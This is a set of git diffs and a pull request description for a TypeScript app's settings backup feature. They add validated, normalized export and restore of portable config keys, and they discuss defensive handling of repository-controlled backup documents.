- * - save-time projections and internal state: subagentAiDefaults, deleteWorktreeOnArchive,
- *   stopCoderWorkspaceOnArchive, preferredCompactionModel (unused), projects (the project
- *   bundle), viewedSplashScreens, migrations, writeId, settingsBackup, onePasswordAccountName.
+ * - destructive archive policies: coderWorkspaceArchiveBehavior and worktreeArchiveBehavior
+ *   (with their legacy deleteWorktreeOnArchive and stopCoderWorkspaceOnArchive spellings). A
+ *   repository-controlled "delete" would make every later archive remove worktrees and Coder
+ *   workspaces, and unpushed work with them, with no prompt naming the policy;
+ * - save-time projections and internal state: subagentAiDefaults, preferredCompactionModel
+ *   (unused), projects (the project bundle), viewedSplashScreens, migrations, writeId,
+ *   settingsBackup, onePasswordAccountName.
  * userPreferences has its own projection, projectBackupPreferences.
  */
 const BACKED_UP_SETTINGS_KEYS = [
@@ -38,8 +56,6 @@ const BACKED_UP_SETTINGS_KEYS = [
   "goalDefaults",
   "chatTranscriptFullWidth",
   "llmDebugLogs",
-  "coderWorkspaceArchiveBehavior",
-  "worktreeArchiveBehavior",
   "runtimeEnablement",
   "defaultRuntime",
   "layoutPresets",
@@ -47,77 +63,128 @@ const BACKED_UP_SETTINGS_KEYS = [
 
 type BackedUpSettingsKey = (typeof BACKED_UP_SETTINGS_KEYS)[number];
 
-const pickMask = Object.fromEntries(BACKED_UP_SETTINGS_KEYS.map((key) => [key, true])) as Record<
-  BackedUpSettingsKey,
-  true
->;
+/**
+ * A backup's settings block. Every key an export writes is present, so a value the user reset
+ * to its default (cleared agent overrides, deleted fallback chains) round-trips as that default
+ * rather than as a gap the restore would fill from the target. `null` is the JSON spelling of
+ * an unset value; a key that is absent, as in a block an older build wrote, keeps the local value.
+ */
+export type BackupSettings = {
+  [K in BackedUpSettingsKey]?: NonNullable<ProjectsConfig[K]> | null;
+};
 
 /**
- * Rewrapped in a plain z.object because `pick` inherits the on-disk schema's passthrough, which
- * would carry any key of a repository-controlled document into the config.
+ * The canonical in-memory value of each setting, using the same normalization Config applies
+ * on save and load. Export, read, merge, and the post-write check all go through this table, so
+ * a schema-valid but non-canonical document (a padded model string, an unsanitized fallback
+ * chain) compares equal to what config.json holds after the write. Unset resolves to what a
+ * loaded config holds when the key is absent: `undefined` for optional settings, the default
+ * for settings load always fills in.
  */
-export const BackupSettingsSchema = z.object(AppConfigOnDiskSchema.pick(pickMask).shape);
+const NORMALIZE: { [K in BackedUpSettingsKey]: (value: unknown) => ProjectsConfig[K] } = {
+  agentAiDefaults: (value) => normalizeAiDefaultsModelStrings(normalizeAgentAiDefaults(value)),
+  defaultModel: normalizeOptionalModelString,
+  hiddenModels: normalizeOptionalModelStringArray,
+  minThinkingLevelByModel: normalizeMinThinkingLevelByModel,
+  modelFallbacks: normalizeModelFallbacks,
+  advisorModelString: parseOptionalNonEmptyString,
+  advisorThinkingLevel: coerceThinkingLevel,
+  advisorReasoningMode: coerceOpenAIReasoningMode,
+  // null is how config.json spells an explicit "unlimited" cap and is kept as written.
+  advisorMaxUsesPerTurn: (value) => (value === null ? null : parseOptionalPositiveInteger(value)),
+  advisorMaxOutputTokens: (value) => (value === null ? null : parseOptionalPositiveInteger(value)),
+  taskSettings: normalizeTaskSettings,
+  heartbeatDefaultPrompt: parseOptionalNonEmptyString,
+  heartbeatDefaultIntervalMs: parseOptionalHeartbeatIntervalMs,
+  goalDefaults: (value) => normalizeGoalDefaults(GoalDefaultsSchema.safeParse(value).data),
+  chatTranscriptFullWidth: (value) => value === true,
+  llmDebugLogs: (value) => value === true,
+  runtimeEnablement: normalizeRuntimeEnablementOverrides,
+  defaultRuntime: normalizeRuntimeEnablementId,
+  layoutPresets: (value) => {
+    const normalized = normalizeLayoutPresetsConfig(value);
+    return isLayoutPresetsConfigEmpty(normalized) ? undefined : normalized;
+  },
+};
 
-export type BackupSettings = z.infer<typeof BackupSettingsSchema>;
+/**
+ * Per-key schemas rather than one picked object: the on-disk schema is passthrough, which would
+ * carry any key of a repository-controlled document into the config, and each key accepts null.
+ */
+function fieldSchema(key: BackedUpSettingsKey): z.ZodType {
+  return AppConfigOnDiskSchema.shape[key].nullable();
+}
+
+function setSetting<K extends BackedUpSettingsKey>(
+  target: BackupSettings,
+  key: K,
+  value: ProjectsConfig[K]
+): void {
+  target[key] = (value ?? null) as BackupSettings[K];
+}
+
+function assignSetting<K extends BackedUpSettingsKey>(
+  target: ProjectsConfig,
+  key: K,
+  value: unknown
+): void {
+  target[key] = NORMALIZE[key](value);
+}
 
 function copyJson<T>(value: T): T {
   return JSON.parse(JSON.stringify(value)) as T;
 }
 
 export function projectBackupSettings(config: ProjectsConfig): BackupSettings {
-  const picked: Partial<Record<BackedUpSettingsKey, unknown>> = {};
+  const projected: BackupSettings = {};
   for (const key of BACKED_UP_SETTINGS_KEYS) {
-    if (config[key] !== undefined) picked[key] = config[key];
+    setSetting(projected, key, NORMALIZE[key](config[key]));
   }
-  // Mirrors what a saved config loads back as, so a fresh install's first export, the export
-  // after its first save, and the post-restore check agree: goalDefaults always resolves to the
-  // effective defaults; an empty agent map, empty layouts, and a false full-width flag are absent.
-  picked.goalDefaults = normalizeGoalDefaults(config.goalDefaults);
-  if (config.agentAiDefaults !== undefined && Object.keys(config.agentAiDefaults).length === 0) {
-    delete picked.agentAiDefaults;
-  }
-  if (config.layoutPresets !== undefined) {
-    const layoutPresets = normalizeLayoutPresetsConfig(config.layoutPresets);
-    if (isLayoutPresetsConfigEmpty(layoutPresets)) delete picked.layoutPresets;
-    else picked.layoutPresets = layoutPresets;
-  }
-  if (config.chatTranscriptFullWidth !== true) delete picked.chatTranscriptFullWidth;
-  return BackupSettingsSchema.parse(copyJson(picked));
+  return copyJson(projected);
 }
 
 /**
- * Throws on a malformed `settings` block so the payload readers reject the backup before a
- * restore writes anything.
+ * Reads and canonicalizes the `settings` block of a preferences document. Throws on a malformed
+ * block, naming the fields, so the payload readers reject the backup before a restore writes
+ * anything and the Backup screen can say what is wrong with the document.
  */
 export function readBackupSettings(document: unknown): BackupSettings | undefined {
   if (!isPlainObject(document) || document.settings === undefined) return undefined;
-  const parsed = BackupSettingsSchema.safeParse(document.settings);
-  if (parsed.success) return parsed.data;
-  // The message reaches the Backup screen, so name the offending fields instead of dumping
-  // the raw issue list.
-  const issues = parsed.error.issues
-    .slice(0, 3)
-    .map((issue) => `${issue.path.map(String).join(".") || "settings"}: ${issue.message}`);
-  throw new Error(`Backup preferences.json has an invalid settings block (${issues.join("; ")})`);
+  const block = document.settings;
+  if (!isPlainObject(block)) {
+    throw new Error("Backup preferences.json has an invalid settings block (expected an object)");
+  }
+  const settings: BackupSettings = {};
+  const issues: string[] = [];
+  for (const key of BACKED_UP_SETTINGS_KEYS) {
+    if (!(key in block)) continue;
+    const parsed = fieldSchema(key).safeParse(block[key]);
+    if (parsed.success) {
+      setSetting(settings, key, NORMALIZE[key](parsed.data));
+      continue;
+    }
+    for (const issue of parsed.error.issues) {
+      issues.push(`${[key, ...issue.path].map(String).join(".")}: ${issue.message}`);
+    }
+  }
+  if (issues.length > 0) {
+    throw new Error(
+      `Backup preferences.json has an invalid settings block (${issues.slice(0, 3).join("; ")})`
+    );
+  }
+  return settings;
 }
 
-/**
- * Each key the backup carries replaces the local value wholesale; absent keys keep the local
- * value, which is how machine-local settings survive a restore.
- */
+/** Each key the block carries replaces the local value; keys it lacks keep the local value. */
 export function mergeBackupSettings(
   current: ProjectsConfig,
   settings: BackupSettings
 ): ProjectsConfig {
-  const { layoutPresets, taskSettings, ...rest } = settings;
-  const merged: ProjectsConfig = { ...current, ...rest };
-  if (taskSettings !== undefined) {
-    merged.taskSettings = normalizeTaskSettings(taskSettings);
+  const merged: ProjectsConfig = { ...current };
+  for (const key of BACKED_UP_SETTINGS_KEYS) {
+    if (key in settings) assignSetting(merged, key, settings[key]);
   }
-  if (layoutPresets !== undefined) {
-    merged.layoutPresets = normalizeLayoutPresetsConfig(layoutPresets);
-  }
-  if (settings.hiddenModels !== undefined) {
+  if (settings.hiddenModels != null) {
     // As Config.updateModelPreferences does: the restored list is now the user's, so the
     // default seeding must not claim it.
     merged.migrations = { ...current.migrations, hiddenModelsInitialized: true };

--- a/src/node/services/backup/settingsProjection.ts
+++ b/src/node/services/backup/settingsProjection.ts
@@ -1,0 +1,120 @@
+import { z } from "zod";
+import { AppConfigOnDiskSchema } from "@/common/config/schemas/appConfigOnDisk";
+import type { ProjectsConfig } from "@/common/types/project";
+import { normalizeTaskSettings } from "@/common/types/tasks";
+import { isLayoutPresetsConfigEmpty, normalizeLayoutPresetsConfig } from "@/common/types/uiLayouts";
+import { isPlainObject } from "@/common/utils/isPlainObject";
+import { normalizeGoalDefaults } from "@/constants/goals";
+
+/**
+ * The top-level config.json settings a backup carries. Everything else stays local, so an
+ * addition fails closed until it is listed here:
+ * - bound to the machine or its network: apiServerBindHost, apiServerPort, apiServerServeWebUi,
+ *   mdnsAdvertisementEnabled, mdnsServiceName, serverSshHost, serverAuthGithubOwner,
+ *   defaultProjectDir, terminalDefaultShell, updateChannel, useSSH2Transport;
+ * - secrets and enrollment: muxGovernorUrl, muxGovernorToken;
+ * - derived from providers.jsonc credentials, which are never exported (see
+ *   providerService.syncGatewayLifecycleEffect): routePriority, routeOverrides, and the legacy
+ *   muxGatewayEnabled and muxGatewayModels;
+ * - save-time projections and internal state: subagentAiDefaults, deleteWorktreeOnArchive,
+ *   stopCoderWorkspaceOnArchive, preferredCompactionModel (unused), projects (the project
+ *   bundle), viewedSplashScreens, migrations, writeId, settingsBackup, onePasswordAccountName.
+ * userPreferences has its own projection, projectBackupPreferences.
+ */
+const BACKED_UP_SETTINGS_KEYS = [
+  "agentAiDefaults",
+  "defaultModel",
+  "hiddenModels",
+  "minThinkingLevelByModel",
+  "modelFallbacks",
+  "advisorModelString",
+  "advisorThinkingLevel",
+  "advisorReasoningMode",
+  "advisorMaxUsesPerTurn",
+  "advisorMaxOutputTokens",
+  "taskSettings",
+  "heartbeatDefaultPrompt",
+  "heartbeatDefaultIntervalMs",
+  "goalDefaults",
+  "chatTranscriptFullWidth",
+  "llmDebugLogs",
+  "coderWorkspaceArchiveBehavior",
+  "worktreeArchiveBehavior",
+  "runtimeEnablement",
+  "defaultRuntime",
+  "layoutPresets",
+] as const satisfies ReadonlyArray<keyof ProjectsConfig & keyof typeof AppConfigOnDiskSchema.shape>;
+
+type BackedUpSettingsKey = (typeof BACKED_UP_SETTINGS_KEYS)[number];
+
+const pickMask = Object.fromEntries(BACKED_UP_SETTINGS_KEYS.map((key) => [key, true])) as Record<
+  BackedUpSettingsKey,
+  true
+>;
+
+/**
+ * Rewrapped in a plain z.object because `pick` inherits the on-disk schema's passthrough, which
+ * would carry any key of a repository-controlled document into the config.
+ */
+export const BackupSettingsSchema = z.object(AppConfigOnDiskSchema.pick(pickMask).shape);
+
+export type BackupSettings = z.infer<typeof BackupSettingsSchema>;
+
+function copyJson<T>(value: T): T {
+  return JSON.parse(JSON.stringify(value)) as T;
+}
+
+export function projectBackupSettings(config: ProjectsConfig): BackupSettings {
+  const picked: Partial<Record<BackedUpSettingsKey, unknown>> = {};
+  for (const key of BACKED_UP_SETTINGS_KEYS) {
+    if (config[key] !== undefined) picked[key] = config[key];
+  }
+  // Mirrors what a saved config loads back as, so a fresh install's first export, the export
+  // after its first save, and the post-restore check all see the same values: goalDefaults
+  // always resolves to the effective defaults, while an empty agent map, an empty layout config,
+  // and a false full-width flag are stored as absent.
+  picked.goalDefaults = normalizeGoalDefaults(config.goalDefaults);
+  if (config.agentAiDefaults !== undefined && Object.keys(config.agentAiDefaults).length === 0) {
+    delete picked.agentAiDefaults;
+  }
+  if (config.layoutPresets !== undefined) {
+    const layoutPresets = normalizeLayoutPresetsConfig(config.layoutPresets);
+    if (isLayoutPresetsConfigEmpty(layoutPresets)) delete picked.layoutPresets;
+    else picked.layoutPresets = layoutPresets;
+  }
+  if (config.chatTranscriptFullWidth !== true) delete picked.chatTranscriptFullWidth;
+  return BackupSettingsSchema.parse(copyJson(picked));
+}
+
+/**
+ * The `settings` block of a preferences document. Throws on a malformed block so the payload
+ * readers reject the backup before a restore writes anything.
+ */
+export function readBackupSettings(document: unknown): BackupSettings | undefined {
+  if (!isPlainObject(document) || document.settings === undefined) return undefined;
+  return BackupSettingsSchema.parse(document.settings);
+}
+
+/**
+ * Each key the backup carries replaces the local value wholesale; absent keys keep the local
+ * value, which is how machine-local settings survive a restore.
+ */
+export function mergeBackupSettings(
+  current: ProjectsConfig,
+  settings: BackupSettings
+): ProjectsConfig {
+  const { layoutPresets, taskSettings, ...rest } = settings;
+  const merged: ProjectsConfig = { ...current, ...rest };
+  if (taskSettings !== undefined) {
+    merged.taskSettings = normalizeTaskSettings(taskSettings);
+  }
+  if (layoutPresets !== undefined) {
+    merged.layoutPresets = normalizeLayoutPresetsConfig(layoutPresets);
+  }
+  if (settings.hiddenModels !== undefined) {
+    // As Config.updateModelPreferences does: the restored list is now the user's, so the
+    // default seeding must not claim it.
+    merged.migrations = { ...current.migrations, hiddenModelsInitialized: true };
+  }
+  return merged;
+}

--- a/src/node/services/backup/settingsProjection.ts
+++ b/src/node/services/backup/settingsProjection.ts
@@ -91,7 +91,14 @@ export function projectBackupSettings(config: ProjectsConfig): BackupSettings {
  */
 export function readBackupSettings(document: unknown): BackupSettings | undefined {
   if (!isPlainObject(document) || document.settings === undefined) return undefined;
-  return BackupSettingsSchema.parse(document.settings);
+  const parsed = BackupSettingsSchema.safeParse(document.settings);
+  if (parsed.success) return parsed.data;
+  // The message reaches the Backup screen, so name the offending fields instead of dumping
+  // the raw issue list.
+  const issues = parsed.error.issues
+    .slice(0, 3)
+    .map((issue) => `${issue.path.map(String).join(".") || "settings"}: ${issue.message}`);
+  throw new Error(`Backup preferences.json has an invalid settings block (${issues.join("; ")})`);
 }
 
 /**

--- a/src/node/services/backup/settingsProjection.ts
+++ b/src/node/services/backup/settingsProjection.ts
@@ -1,5 +1,6 @@
 import { z } from "zod";
 import { AppConfigOnDiskSchema, GoalDefaultsSchema } from "@/common/config/schemas/appConfigOnDisk";
+import { ADVISOR_DEFAULT_MAX_USES_PER_TURN } from "@/common/constants/advisor";
 import { normalizeAgentAiDefaults } from "@/common/types/agentAiDefaults";
 import type { ProjectsConfig } from "@/common/types/project";
 import { normalizeTaskSettings } from "@/common/types/tasks";
@@ -67,7 +68,9 @@ type BackedUpSettingsKey = (typeof BACKED_UP_SETTINGS_KEYS)[number];
  * A backup's settings block. Every key an export writes is present, so a value the user reset
  * to its default (cleared agent overrides, deleted fallback chains) round-trips as that default
  * rather than as a gap the restore would fill from the target. `null` is the JSON spelling of
- * an unset value; a key that is absent, as in a block an older build wrote, keeps the local value.
+ * an unset value, except for advisorMaxUsesPerTurn, where the app itself uses null for
+ * "unlimited" and an unset cap therefore exports as the default cap. A key that is absent, as in
+ * a block an older build wrote, keeps the local value.
  */
 export type BackupSettings = {
   [K in BackedUpSettingsKey]?: NonNullable<ProjectsConfig[K]> | null;
@@ -161,6 +164,11 @@ export function projectBackupSettings(config: ProjectsConfig): BackupSettings {
   const projected: BackupSettings = {};
   for (const key of BACKED_UP_SETTINGS_KEYS) {
     setSetting(projected, key, NORMALIZE[key](config[key]));
+  }
+  // The advisor reads null as "unlimited" and unset as the default cap, so an unset cap cannot
+  // take the block's null spelling: a default source would switch the target to unlimited.
+  if (config.advisorMaxUsesPerTurn === undefined) {
+    projected.advisorMaxUsesPerTurn = ADVISOR_DEFAULT_MAX_USES_PER_TURN;
   }
   return copyJson(projected);
 }

--- a/src/node/services/backup/settingsProjection.ts
+++ b/src/node/services/backup/settingsProjection.ts
@@ -1,4 +1,4 @@
-import type { z } from "zod";
+import { z } from "zod";
 import { AppConfigOnDiskSchema, GoalDefaultsSchema } from "@/common/config/schemas/appConfigOnDisk";
 import { normalizeAgentAiDefaults } from "@/common/types/agentAiDefaults";
 import type { ProjectsConfig } from "@/common/types/project";
@@ -120,11 +120,21 @@ const NORMALIZE: { [K in BackedUpSettingsKey]: (value: unknown) => ProjectsConfi
 };
 
 /**
+ * The on-disk schema leaves layoutPresets unknown and its normalizer reads a version it does not
+ * know as an empty config, which a restore would turn into deleting the target's presets. Pin
+ * the versions this build migrates so a newer document is reported as unsupported instead.
+ */
+const LAYOUT_PRESETS_SCHEMA = z
+  .object({ version: z.union([z.literal(1), z.literal(2)]) })
+  .passthrough();
+
+/**
  * Per-key schemas rather than one picked object: the on-disk schema is passthrough, which would
  * carry any key of a repository-controlled document into the config, and each key accepts null.
  */
 function fieldSchema(key: BackedUpSettingsKey): z.ZodType {
-  return AppConfigOnDiskSchema.shape[key].nullable();
+  const schema = key === "layoutPresets" ? LAYOUT_PRESETS_SCHEMA : AppConfigOnDiskSchema.shape[key];
+  return schema.nullable();
 }
 
 function setSetting<K extends BackedUpSettingsKey>(

--- a/src/node/services/backup/settingsProjection.ts
+++ b/src/node/services/backup/settingsProjection.ts
@@ -70,9 +70,8 @@ export function projectBackupSettings(config: ProjectsConfig): BackupSettings {
     if (config[key] !== undefined) picked[key] = config[key];
   }
   // Mirrors what a saved config loads back as, so a fresh install's first export, the export
-  // after its first save, and the post-restore check all see the same values: goalDefaults
-  // always resolves to the effective defaults, while an empty agent map, an empty layout config,
-  // and a false full-width flag are stored as absent.
+  // after its first save, and the post-restore check agree: goalDefaults always resolves to the
+  // effective defaults; an empty agent map, empty layouts, and a false full-width flag are absent.
   picked.goalDefaults = normalizeGoalDefaults(config.goalDefaults);
   if (config.agentAiDefaults !== undefined && Object.keys(config.agentAiDefaults).length === 0) {
     delete picked.agentAiDefaults;
@@ -87,8 +86,8 @@ export function projectBackupSettings(config: ProjectsConfig): BackupSettings {
 }
 
 /**
- * The `settings` block of a preferences document. Throws on a malformed block so the payload
- * readers reject the backup before a restore writes anything.
+ * Throws on a malformed `settings` block so the payload readers reject the backup before a
+ * restore writes anything.
  */
 export function readBackupSettings(document: unknown): BackupSettings | undefined {
   if (!isPlainObject(document) || document.settings === undefined) return undefined;

--- a/src/node/services/backup/settingsProjection.ts
+++ b/src/node/services/backup/settingsProjection.ts
@@ -1,6 +1,7 @@
-import { z } from "zod";
+import type { z } from "zod";
 import { AppConfigOnDiskSchema, GoalDefaultsSchema } from "@/common/config/schemas/appConfigOnDisk";
 import { ADVISOR_DEFAULT_MAX_USES_PER_TURN } from "@/common/constants/advisor";
+import { LayoutPresetsConfigSchema } from "@/common/orpc/schemas/uiLayouts";
 import { normalizeAgentAiDefaults } from "@/common/types/agentAiDefaults";
 import type { ProjectsConfig } from "@/common/types/project";
 import { normalizeTaskSettings } from "@/common/types/tasks";
@@ -123,20 +124,16 @@ const NORMALIZE: { [K in BackedUpSettingsKey]: (value: unknown) => ProjectsConfi
 };
 
 /**
- * The on-disk schema leaves layoutPresets unknown and its normalizer reads a version it does not
- * know as an empty config, which a restore would turn into deleting the target's presets. Pin
- * the versions this build migrates so a newer document is reported as unsupported instead.
- */
-const LAYOUT_PRESETS_SCHEMA = z
-  .object({ version: z.union([z.literal(1), z.literal(2)]) })
-  .passthrough();
-
-/**
  * Per-key schemas rather than one picked object: the on-disk schema is passthrough, which would
  * carry any key of a repository-controlled document into the config, and each key accepts null.
+ * layoutPresets is unknown on disk and its normalizer reads anything it cannot parse (a newer
+ * version, corrupt slots) as an empty config, which a restore would turn into deleting the
+ * target's presets; the strict schema the layouts API saves through is used instead, so such a
+ * document is reported as unsupported.
  */
 function fieldSchema(key: BackedUpSettingsKey): z.ZodType {
-  const schema = key === "layoutPresets" ? LAYOUT_PRESETS_SCHEMA : AppConfigOnDiskSchema.shape[key];
+  const schema =
+    key === "layoutPresets" ? LayoutPresetsConfigSchema : AppConfigOnDiskSchema.shape[key];
   return schema.nullable();
 }
 

--- a/src/node/services/backup/settingsProjection.ts
+++ b/src/node/services/backup/settingsProjection.ts
@@ -73,6 +73,18 @@ export type BackupSettings = {
   [K in BackedUpSettingsKey]?: NonNullable<ProjectsConfig[K]> | null;
 };
 
+export interface BackupSettingsRead {
+  /** The keys this build can apply; undefined when the document carries no settings block. */
+  settings: BackupSettings | undefined;
+  /**
+   * Keys whose values fail this build's schema, so a restore keeps the local value: a newer
+   * build's export (a thinking level or runtime this build predates) or a damaged document.
+   * Reported rather than failing the restore, which would strand every other backed-up file
+   * behind an upgrade.
+   */
+  unsupported: string[];
+}
+
 /**
  * The canonical in-memory value of each setting, using the same normalization Config applies
  * on save and load. Export, read, merge, and the post-write check all go through this table, so
@@ -143,36 +155,27 @@ export function projectBackupSettings(config: ProjectsConfig): BackupSettings {
   return copyJson(projected);
 }
 
-/**
- * Reads and canonicalizes the `settings` block of a preferences document. Throws on a malformed
- * block, naming the fields, so the payload readers reject the backup before a restore writes
- * anything and the Backup screen can say what is wrong with the document.
- */
-export function readBackupSettings(document: unknown): BackupSettings | undefined {
-  if (!isPlainObject(document) || document.settings === undefined) return undefined;
+/** Reads and canonicalizes the `settings` block of a preferences document. */
+export function readBackupSettings(document: unknown): BackupSettingsRead {
+  if (!isPlainObject(document) || document.settings === undefined) {
+    return { settings: undefined, unsupported: [] };
+  }
   const block = document.settings;
   if (!isPlainObject(block)) {
-    throw new Error("Backup preferences.json has an invalid settings block (expected an object)");
+    return { settings: undefined, unsupported: ["settings (not an object)"] };
   }
   const settings: BackupSettings = {};
-  const issues: string[] = [];
+  const unsupported: string[] = [];
   for (const key of BACKED_UP_SETTINGS_KEYS) {
     if (!(key in block)) continue;
     const parsed = fieldSchema(key).safeParse(block[key]);
     if (parsed.success) {
       setSetting(settings, key, NORMALIZE[key](parsed.data));
-      continue;
-    }
-    for (const issue of parsed.error.issues) {
-      issues.push(`${[key, ...issue.path].map(String).join(".")}: ${issue.message}`);
+    } else {
+      unsupported.push(key);
     }
   }
-  if (issues.length > 0) {
-    throw new Error(
-      `Backup preferences.json has an invalid settings block (${issues.slice(0, 3).join("; ")})`
-    );
-  }
-  return settings;
+  return { settings, unsupported };
 }
 
 /** Each key the block carries replaces the local value; keys it lacks keep the local value. */

--- a/tests/ui/BackupSection.test.ts
+++ b/tests/ui/BackupSection.test.ts
@@ -48,6 +48,7 @@ function renderBackupSection(
       commandApprovals: [],
       projectImports: [],
       projectBundleSkipped: false,
+      unsupportedSettings: [],
       pushError: null,
     },
     backupRestore: {
@@ -57,6 +58,7 @@ function renderBackupSection(
       localOnlyFiles: ["agents/local.md"],
       projectImportResults: [],
       projectBundleSkipped: false,
+      unsupportedSettings: [],
       unapprovedProjectImports: [],
     },
     ...overrides,
@@ -488,6 +490,7 @@ describe("BackupSection", () => {
         commandApprovals: [approval],
         projectImports: [],
         projectBundleSkipped: false,
+        unsupportedSettings: [],
         pushError: null,
       },
     });
@@ -552,6 +555,7 @@ describe("BackupSection", () => {
         commandApprovals: [approval],
         projectImports: [],
         projectBundleSkipped: false,
+        unsupportedSettings: [],
         pushError: null,
       },
     });
@@ -599,6 +603,7 @@ describe("BackupSection", () => {
         localOnlyFiles: [],
         projectImportResults: [],
         projectBundleSkipped: false,
+        unsupportedSettings: [],
         unapprovedProjectImports: [],
       },
     });
@@ -652,6 +657,7 @@ describe("BackupSection", () => {
         commandApprovals: [],
         projectImports: [candidate, unapproved],
         projectBundleSkipped: false,
+        unsupportedSettings: [],
         pushError: null,
       },
       backupRestore: {
@@ -671,6 +677,7 @@ describe("BackupSection", () => {
           },
         ],
         projectBundleSkipped: false,
+        unsupportedSettings: [],
         unapprovedProjectImports: [],
       },
     });
@@ -716,6 +723,7 @@ describe("BackupSection", () => {
         commandApprovals: [],
         projectImports: [candidate],
         projectBundleSkipped: false,
+        unsupportedSettings: [],
         pushError: null,
       },
       backupRestore: {
@@ -736,6 +744,7 @@ describe("BackupSection", () => {
           },
         ],
         projectBundleSkipped: false,
+        unsupportedSettings: [],
         // The backend re-offers a conflicted import; the UI must not call it done.
         unapprovedProjectImports: [candidate],
       },
@@ -787,6 +796,7 @@ describe("BackupSection", () => {
         },
       ],
       projectBundleSkipped: false,
+      unsupportedSettings: [],
       unapprovedProjectImports: attemptResult.skippedFiles.length > 0 ? [candidate] : [],
     });
     const { view } = renderBackupSection(
@@ -799,6 +809,7 @@ describe("BackupSection", () => {
           commandApprovals: [],
           projectImports: [candidate],
           projectBundleSkipped: false,
+          unsupportedSettings: [],
           pushError: null,
         },
       },
@@ -888,6 +899,7 @@ describe("BackupSection", () => {
         commandApprovals: [],
         projectImports: [staleCandidate],
         projectBundleSkipped: false,
+        unsupportedSettings: [],
         pushError: null,
       },
     });
@@ -937,6 +949,7 @@ describe("BackupSection", () => {
           },
         ],
         projectBundleSkipped: false,
+        unsupportedSettings: [],
         pushError: null,
       },
     });
@@ -962,6 +975,7 @@ describe("BackupSection", () => {
         commandApprovals: [],
         projectImports: [],
         projectBundleSkipped: true,
+        unsupportedSettings: [],
         pushError: null,
       },
     });
@@ -970,5 +984,27 @@ describe("BackupSection", () => {
 
     fireEvent.click(canvas.getByRole("button", { name: "Preview changes" }));
     await canvas.findByText(/carries a project bundle, but project backup is disabled/);
+  });
+
+  test("names the backed-up settings this version cannot apply after a preview", async () => {
+    const { view } = renderBackupSection({
+      backupPreview: {
+        pushChanges: [],
+        restoreChanges: [{ status: "M", path: "preferences.json" }],
+        localOnlyFiles: [],
+        redactions: [],
+        commandApprovals: [],
+        projectImports: [],
+        projectBundleSkipped: false,
+        unsupportedSettings: ["agentAiDefaults", "defaultRuntime"],
+        pushError: null,
+      },
+    });
+    const canvas = within(view.container);
+    await canvas.findByText("Settings backup");
+    expect(canvas.queryByText("agentAiDefaults, defaultRuntime")).toBeNull();
+
+    fireEvent.click(canvas.getByRole("button", { name: "Preview changes" }));
+    await canvas.findByText("agentAiDefaults, defaultRuntime");
   });
 });


### PR DESCRIPTION
## Summary

Settings backup now carries the portable top-level `config.json` settings and restores them: per-agent model overrides (`agentAiDefaults`: model, thinking level, reasoning mode, enabled and advisor flags, sub-agent profile), default and hidden models, minimum thinking levels, model fallbacks, advisor settings, task settings, heartbeat interval and goal defaults, transcript width, debug-log toggle, runtime enablement and default runtime, and layout presets. Before this change the backup exported only a subset of `userPreferences`, so a restore on another machine left every one of these at the target's values.

## Status

Head `57b17ac8`. **Paused for a scope decision (20:40Z).** The Codex code review on this head is clean (👍 at 20:14Z, no open code threads); every CI job is green except the Codex gate, which is held by one open security thread: [cap terminal placeholders in restored layouts](https://github.com/coder/xum/pull/4229#discussion_r4030521992) (Medium). A repository-controlled `layoutPresets` value restored from the backup can open an unbounded number of terminals on one shortcut (`resolveTerminalSessions` creates a session per `terminal_new:*` placeholder and nothing bounds the count) and chooses the preset's global keybind. Since the round-11 pause the layout mechanism has drawn three more findings while every other key in the block converged, so the next step is Mike's decision, not another patch: (A) bound placeholder count and duplicates in the projection's layout schema (restore-only) and take one more review pair, or (B) remove `layoutPresets` from the portable block and decide whether the `UILayoutsProvider` hardening stays. Not enqueued until then.

Fixed and pushed on this head: the round-13/14 findings (heartbeat prompt excluded as agent-executed text, `31a18f16`; nested agent model validation, `13ce47f3`; layout edit aborts when every pre-write read was overtaken, `e64d1467`; first layout snapshot only after the config subscription is armed, `524ed190`), the round-11 findings (bounded re-read `cf75ef35`, normalization-rejected values `4d4f4b20`), and the merge of `origin/main` (`f0a3076d`) resolving the conflicts with #3985 (the settings block rides the existing "Portable preferences" content flag). Earlier provenance is condensed in the ledger toggle.

## Background

Restoring a backup did not bring back the exec/plan model overrides configured under Settings > Agents, or any other top-level setting. `createBackupPayload` wrote AGENTS.md, agents, skills, global memory, redacted `mcp.jsonc` and a `preferences.json` projected from `userPreferences` alone; nothing read the rest of the config.

## Implementation

- `src/node/services/backup/settingsProjection.ts`: a fail-closed allowlist of the portable keys with the exclusion rationale (machine/network-local values, governor secrets, credential-derived routing, destructive archive policies, agent-executed text such as the heartbeat prompt, legacy save-time projections, internal state). Keys are validated one at a time against `AppConfigOnDiskSchema` (the on-disk schema is passthrough, so a picked object would carry any key of a repository-controlled document into the config).
- The export is a complete snapshot: every listed key is present and `null` means unset, so a setting the user reset to its default (cleared agent overrides, deleted fallback chains, full-width off) round-trips as that default instead of a gap the restore fills from the target. `agentAiDefaults` spells its empty state as `{}`, the value config load normalizes to. A key that is absent from the block (an older build's export) keeps the local value.
- One `NORMALIZE` table maps each key to the canonical in-memory value using the same functions `Config` applies on save and load (exported from `src/node/config/index.ts` for that purpose). Export, read, merge and the post-write verification share it, so a schema-valid but non-canonical document (a padded model string, an unsanitized fallback chain) compares equal to what `config.json` holds after the write instead of tripping the post-write `IO_ERROR` after files were written.
- The block rides inside `preferences.json` under a sibling `settings` key. No new payload file and no schema bump: older builds refuse unknown payload paths while parsing the manifest, but their non-strict `UserPreferencesSchema` strips the unknown key, so they keep restoring what they understand.
- Restore merges each present key over the local config inside the same `editConfig` edit as preferences (`hiddenModels` also marks `migrations.hiddenModelsInitialized`, as the UI path does); preview flags `preferences.json` as modified when settings differ.
- Downgrade tolerance: a key whose value fails this build's schema (a thinking level or runtime added by a newer build, a damaged document, or a model string the normalizer rejects, at the top level or inside an agent's defaults) keeps its local value instead of failing the whole restore. Preview and restore results name such keys in `unsupportedSettings` (same pattern as `projectBundleSkipped`) and the Backup section shows them, so the user knows what to reapply after updating.
- Renderer: model, agent and runtime defaults are read from localStorage mirrors seeded from the backend at startup. A restore rewrites config behind them, which left Settings > Models and Runtimes stale and let the next hide/unhide persist the stale list over the restored one. Seeding now lives in `seedConfigMirrors` (authoritative: a value the backend no longer holds clears the mirror; startup dirty keys stay protected) and the Backup section re-seeds after a successful restore. `UILayoutsProvider` subscribes to `onConfigChanged` before taking its first snapshot and refreshes on every change so restored layout presets apply without a reload; a layout edit re-reads config right before writing and aborts if every read was overtaken by a newer change.
